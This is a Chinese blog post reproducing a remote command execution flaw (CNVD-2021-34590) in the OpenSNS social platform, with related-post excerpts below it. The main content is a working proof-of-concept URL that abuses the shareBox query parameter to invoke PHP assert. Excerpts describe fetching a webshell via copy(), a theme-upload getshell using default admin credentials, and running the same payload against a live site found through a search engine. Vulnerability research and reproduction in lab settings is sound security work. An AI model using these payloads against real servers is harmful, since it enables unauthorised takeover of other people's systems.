opensns 命令执行 (CNVD-2021-34590)漏洞复现

原创 已于 2024-04-03 09:45:57 修改 · 1.8k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #java #web安全

于 2022-09-23 09:43:27 首次发布
OpenSNS社交软件存在命令执行漏洞,攻击者可通过构造特定URL获取服务器控制权。POC显示,利用参数组合可执行恶意命令,例如触发phpinfo()函数。

1.漏洞描述

        OpenSNS是想天科技开发的一款综合性社交软件。 OpenSNS存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限。

2.打开页面

178f2378787e4ad29f574f73de6390f3.png

 3.构造poc

/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule->_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=phpinfo()

686d6f6c5f174debb78e14f486a784ea.png

 

漏洞复现 || OpenSNS远程命令执行漏洞
失心少年
07-12 1062
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!opensns是基于tp3开发的,仅支持php5,漏洞入口在 weibo/share/sharebox,通过 get请求提交query参数,存在变量覆盖的漏洞,攻击者通过漏洞发送特定的请求包可以执行任意命令。1.执行如下POC可执行远程命令。
OpenSNS开源社交系统--文件上传渗透测试复现
CNXBDSa的博客
08-19 2163
前提:在先知社区里面偶然看见了这个漏洞,咱也想试试,就下载了开源的码进行了本地的复现 源码信息:OpenSNS开源版 漏洞类型:后台getshell 下载地址:http://www.opensns.cn/home/index/download.html 漏洞文件:./Application/Admin/Controller/ThemeController.class.php 第170行 可参考这下载安装使用https://www.w3cschool.cn/opensnscourse/laxp1pnw.htm
OpenSNS-a5
11-08
opensns源码,下载安装即可使用,可以在在代码里面编辑一系列内容
OpenSNS 文件上传getshell
Jiajiajiang_的博客
08-06 1206
当前版本为OpenSNS V5 首先需要登录到后台,默认密码为admin/123456 可以进行尝试 进来后台后,找到上传主题压缩包的地方,也可以直接访问 http://xx.xxx.com/index.php?s=/admin/theme/add.html 在这之前准备一个一句话,当然大马也可以,将你的一句话压缩成一个压缩包。 如图所示,记住压缩前马的名字。 点击上传主题压...
OpenSNS v6.2.0开源社交系统全功能实战平台
最新发布
weixin_34725745的博客
10-26 846
OpenSNS v6.2.0基于PHP+MySQL技术栈,采用模块化与插件化设计思想,构建可扩展的社交网络平台。系统遵循MIT开源协议,支持自由定制与二次开发,适用于兴趣社区、企业内网、校园社交等多种场景。其核心架构通过解耦的功能模块(如用户中心、内容发布、权限管理)实现高内聚低耦合,结合事件驱动机制提升模块间通信灵活性。// 示例:模块注册入口(伪代码)'name' => '微博模块',]);
Opensns 命令执行漏洞CNVD-2021-34590)
小小猪的博客
12-29 4395
Opensns 命令执行漏洞CNVD-2021-34590) 漏洞描述: OpenSNS 存在远程命令执行漏洞,攻击者通过漏洞发送特定的请求包可以执行任意命令 影响版本: OpenSNS v5 环境搭建: 在线环境 地址 访问首页 构造poc /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[m.
OpenSNS 远程执行任意命令漏洞
未花的博客
12-01 800
status必须等于1,值里必须要app、model、method
OpenSNS命令执行(CNVD-2021-34590)
m0_65150886的博客
01-22 836
OpenSNS是想天科技开发的一款综合性社交软件。用户可以使用OpenSNS快速搭建一个类似于新浪微博一样的功能强大的社交网站。用户的社交网站也可以在微信中被访问,还支持苹果和安卓手机通过APP的形式使用。除此之外,OpenSNS还提供云市场进行功能扩展。OpenSNS v5存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限。1.访问http://ip:port,出现如下页面,开始实验。2.构造payload,访问phpinfo。
vulfocus——opensns命令执行(CNVD-2021-34590
m0_62063669的博客
09-29 1116
此处的cmd= 只能传参1个,在使用'system'函数空格会导致执行失败,故而使用php中的copy函数直接下载webshell实现RCE。OpenSNS存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限。copy(远程文件下载地址,需要下载到的地方)4.也可以通过下载webshell,用工具连接。2.发送特定请求包可以执行任意命令。3.在phpinfo找到flag。
OpenSNS开源社交系统 v5.7.0
10-14
OpenSNS一款有身份的开源SNS社交系统,包含 微博、资讯、活动、论坛、专辑、积分商城、群组、充值中心、 问答、分类信息、微店等模块,支持PC端、手机网页版、客户端、 微信版
CNVD-2024-36533漏洞复现
09-04
命令执行漏洞(如您在引用[1]、[2]、[3]中提到的SeaCMS、用友NC和OpenSNS案例)通常涉及输入验证缺失,允许攻击者注入恶意代码执行系统命令。复现这类漏洞的一般步骤包括: 1. **环境搭建**:安装受影响的软件版本...
opensns v6.2.0前台RCE漏洞分析
weixin_40484719的博客
10-16 3249
最近准备进一步学习下代码审计,因此打算找些历史漏洞分析学习下。(啥时候我也能挖出前台rce呢 本次漏洞的入口点在于 Application/Weibo/Controller/ShareController.class.php的shareBox方法。 Application/Weibo/Controller/ShareController.class.php share控制器获取外部输入$query,并将它用parse_str解析后交给$array,这里其实就相当于传入了一个数组。接下...
opensns综合性社交软件系统存在远程命令执行高危漏洞
weixin_68647219的博客
08-01 3702
opensns综合性社交软件系统远程命令执行高危漏洞,该漏洞是由于漏洞入口在 weibo/share/sharebox通过 get请求提交query参数存在变量覆盖,可能导致攻击者通过漏洞发送特定的请求包执行任意命令。
一次渗透测试......OpenSNS漏洞
giaogiao123的博客
08-09 1803
fofa上直接找,找到某倒霉的站。 直接搜索OpenSNSv 6.2 首先开始试一试前台rce index.php?s=weibo/share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[method]=-%3E_validationFieldItem%26id[status]=1%26id[4]=function%26id[1]=assert%26id[args]=jiang=phpinfo()%26id
红帽杯2021 决赛 opensns 复现
feng的博客
08-05 942
前言 因为某些事情,没有参加今年的红帽杯决赛,所以来复现一下决赛的Web题里面的opensns,学习一下思路。 复现 根据网上的文章进行复现学习。感觉能找到这个洞的师傅实在tql。 漏洞点位于Application/Weibo/Controller/ShareController.class.php的shareBox方法: public function shareBox(){ $query = urldecode(I('get.query','','text'));
openSNS(V2版本) 用户身份切换可能产生的bug以及正规流程
F_shan的博客
07-29 1028
openSNS V2版本注册用户的身份切换有一个严格的流程,不是通过这个流程切换用户身份会造成登入和提示身份未审核或禁用提示,影响体验。在此我会给出身份切换的流程:
opensns html5,记对OpenSNS的一次代码审计
weixin_29289821的博客
06-28 364
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。我在FreeBuf上每天都可以学到很多新思路新技术,感谢这个平台,为了回馈FreeBuf的小伙伴们,写下这篇文章,希望在可以为奋斗在网络安全路上的小伙伴们提供一些新奇小思路,其实挖洞并不难,也希望大家能把分享的精神发扬光大。概述OpenSNS是想天科技开发的一款综合性社交软件。您可以...
OpenSNS后台文件上传漏铜分析
weixin_30369087的博客
07-06 391
前言   这几天正在想找个文件上传漏洞分析一波,以加深对文件上传漏洞的理解,正好看到FreeBuf的一片文章记对OpenSNS的一次代码审计,由于其只对漏洞进行复现,故在此进行代码层面的分析。 漏洞分析   已知漏洞产生点:./Application/Admin/Controller/ThemeController.class.php 第170行      跟入upload函数(...
openssl漏洞怎么处理_针对CBC字节反转攻击的研究与漏洞复现
weixin_39546747的博客
11-27 302
作者:Qftm合天智汇CBC 简介现代密码体制现代密码中的加密体制一般分为对称加密体制(Symmetric Key Encryption)和非对称加密体制(Asymmetric Key Encryption)。对称加密又分为分组加密和序列密码。分组密码分组密码:也叫块加密(block cyphers),一次加密明文中的一个块。是将明文按一定的位长分组,明文组经过加密运算得到密文组,密文组经过解密运...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值